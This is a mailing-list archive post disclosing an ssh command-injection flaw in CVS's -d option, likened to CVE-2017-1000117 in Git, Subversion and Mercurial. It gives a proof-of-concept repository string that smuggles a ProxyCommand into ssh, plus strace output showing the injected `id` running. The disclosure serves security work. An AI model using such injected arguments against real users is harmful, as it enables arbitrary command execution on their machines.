[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
CVS and ssh command injection (see CVE-2017-1000117, etc.)
From: |
Hank Leininger |
Subject: |
CVS and ssh command injection (see CVE-2017-1000117, etc.) |
Date: |
Thu, 10 Aug 2017 22:19:26 -0600 |
Bugs in Git, Subversion, and Mercurial were just announced & patched
which allowed arbitrary local command execution if a malicious name was
used for the remote server, such as starting with - to pass options to
the ssh client:
git clone ssh://-oProxyCommand=some-command...
CVS has a similar problem with the -d option:
$ strace -f -e execve cvs -d '-oProxyCommand=id;localhost:/bar' co yada 2>&1
| egrep [^pu]id
execve("/usr/bin/cvs", ["cvs", "-d", "-oProxyCommand=id;localhost:/bar",
"co", "yada"], 0x7ffe69f75a68 /* 139 vars */) = 0
[snip]
[pid 20003] execve("/usr/local/bin/ssh", ["ssh",
"-oProxyCommand=id;localhost", "cvs server"], 0x5fb1fc8420 /* 141 vars */ ) =
-1 ENOENT (No such file or directory)
[pid 20003] execve("/usr/bin/ssh", ["ssh", "-oProxyCommand=id;localhost",
"cvs server"], 0x5fb1fc8420 /* 141 vars */) = 0
[pid 20004] execve("/bin/bash", ["/bin/bash", "-c", "exec id;localhost"],
0x32af5f10d0 /* 141 vars */) = 0
[pid 20004] execve("/usr/bin/id", ["id"], 0xec92226ae0 /* 141 vars */) = 0
ssh_exchange_identification: Connection closed by remote host
Tested vanilla CVS 1.12.13, and Gentoo CVS 1.12.12-r11.
Of course, the repo specification looks very odd, so tricking a victim
may be harder than for SCM tools where it's prefixed by an ssh://, or
masked behind a redirect, or submodule paths may be followed without
user interaction.
See also:
https://marc.info/?l=oss-security&m=150241876103454&w=2
https://marc.info/?l=subversion-announce&m=150238900328980&w=2
https://marc.info/?l=git&m=150238802328673&w=2
https://subversion.apache.org/security/CVE-2017-9800-advisory.txt
Thanks,
--
Hank Leininger <hlein@korelogic.com>
5F6D DCC8 FF53 8093 EC39 127B 091E 7F7C E898 E86C
signature.asc
Description: Digital signature
- CVS and ssh command injection (see CVE-2017-1000117, etc.),
Hank Leininger <=